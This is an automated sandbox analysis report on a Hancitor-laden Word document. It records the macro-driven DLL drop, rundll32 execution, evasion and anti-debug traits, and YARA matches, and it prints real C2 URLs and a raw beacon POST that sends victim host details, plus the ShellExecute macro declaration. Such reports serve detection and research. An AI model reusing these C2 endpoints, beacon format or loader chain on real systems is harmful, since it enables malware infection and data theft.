DNS traffic detected: queries for: api.ipify.org

Source: unknown

HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 105Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)

Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://anspossthrly.ru/8/forum.php
Source: rundll32.exe	String found in binary or memory: http://api.ipify.org
Source: svchost.exe, 00000005.00000002.2168568117.0000000000624000.00000004.00000020.sdmp	String found in binary or memory: http://api.ipify.org/?format=xml
Source: rundll32.exe, 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp	String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://sudepallon.com/8/forum.php
Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmp	String found in binary or memory: http://thentabecon.ru/8/forum.php
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Malicious sample detected (through community Yara rule)

Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE	Matched rule: Hancitor Payload Author: kevoreilly

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled eclmng. please click Engble
Source: Screenshot number: 12	Screenshot OCR: Enable editing txjtton from the yellow bar above Once you have enabled edmng. please cHck Enable
Source: Screenshot number: 12	Screenshot OCR: Enable content button from the yellow bar above a S

Document contains OLE streams with PE executables

Source: 0708_3355614568218.doc

Stream path 'ObjectPool/_1687137834/\x1Ole10Native' : MZ signature found

Document contains an embedded VBA macro which may execute processes

Source: 0708_3355614568218.doc

OLE, VBA macro line: Private Declare PtrSafe Function gc Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Document contains an embedded VBA macro with suspicious strings

Source: 0708_3355614568218.doc

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\nimb.dll

Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_004293B0: GetFileInformationByHandle,DeviceIoControl,

5_2_004293B0

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02121E10	3_2_02121E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213BB0E	3_2_0213BB0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02131B95	3_2_02131B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132848	3_2_02132848
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132068	3_2_02132068
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211F0C0	3_2_0211F0C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212F92D	3_2_0212F92D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213A1C3	3_2_0213A1C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B1F0	3_2_0212B1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213A705	3_2_0213A705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212FF50	3_2_0212FF50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213243C	3_2_0213243C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213547B	3_2_0213547B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02132C68	3_2_02132C68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02139C81	3_2_02139C81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E85F	5_2_0040E85F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00415800	5_2_00415800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040F9C0	5_2_0040F9C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004122DD	5_2_004122DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004220F8	5_2_004220F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00425141	5_2_00425141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042D972	5_2_0042D972
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042F101	5_2_0042F101
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004261C4	5_2_004261C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004221DF	5_2_004221DF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430268	5_2_00430268
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040727F	5_2_0040727F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FA0C	5_2_0042FA0C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040B2F3	5_2_0040B2F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FB2C	5_2_0042FB2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00432BF4	5_2_00432BF4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040A3A4	5_2_0040A3A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042F445	5_2_0042F445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00420408	5_2_00420408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430C08	5_2_00430C08
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004314CB	5_2_004314CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00409CE5	5_2_00409CE5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042E4B7	5_2_0042E4B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042057D	5_2_0042057D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00414506	5_2_00414506
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00406D10	5_2_00406D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430523	5_2_00430523
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042DDCA	5_2_0042DDCA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00409DD8	5_2_00409DD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042FE02	5_2_0042FE02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00430E22	5_2_00430E22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00432E3A	5_2_00432E3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042E6E2	5_2_0042E6E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042EEA0	5_2_0042EEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040A71A	5_2_0040A71A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042EFC5	5_2_0042EFC5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040BFEF	5_2_0040BFEF

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 0708_3355614568218.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Document contains embedded VBA macros

Source: 0708_3355614568218.doc

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 0212FEF0 appears 51 times

Yara signature match

Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE	Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload

Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/14@7/5

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,

5_2_00415800

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$08_3355614568218.doc

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC438.tmp

Jump to behavior

Source: 0708_3355614568218.doc

OLE indicator, Word Document stream: true

Source: 0708_3355614568218.doc	OLE document summary: title field not present or empty
Source: 0708_3355614568218.doc	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR

Source: 0708_3355614568218.doc

Virustotal: Detection: 37%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

3_2_02113580

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211CB68 push ebp; iretd	3_2_0211CB6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211E006 push ds; ret	3_2_0211E01F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213C024 push ds; retf	3_2_0213C025
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211D829 push ebp; ret	3_2_0211D844
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211E8BF push esp; iretd	3_2_0211E8C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B8E9 push ecx; ret	3_2_0212B8FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211A964 push edi; ret	3_2_0211A9B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212FF35 push ecx; ret	3_2_0212FF48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211CCC8 push ecx; ret	3_2_0211CCC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0211A55A push eax; ret	3_2_0211A56E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214F2CF push edx; ret	3_2_0214F2D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02150903 push ecx; retf	3_2_02150904
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214D561 push eax; ret	3_2_0214D591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214D5E0 push eax; ret	3_2_0214D591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00435E20 push dword ptr [eax+04h]; ret	5_2_00435E4F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\nimb.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: 0708_3355614568218.doc

Stream path 'Data' entropy: 7.97264179911 (max. 8.0)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\svchost.exe TID: 2976

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

3_2_02113400

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0212B328

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,

3_2_02113580

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E556 mov eax, dword ptr fs:[00000030h]	3_2_0214E556
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E485 mov eax, dword ptr fs:[00000030h]	3_2_0214E485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0214E08C push dword ptr fs:[00000030h]	3_2_0214E08C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02111390 GetProcessHeap,RtlAllocateHeap,

3_2_02111390

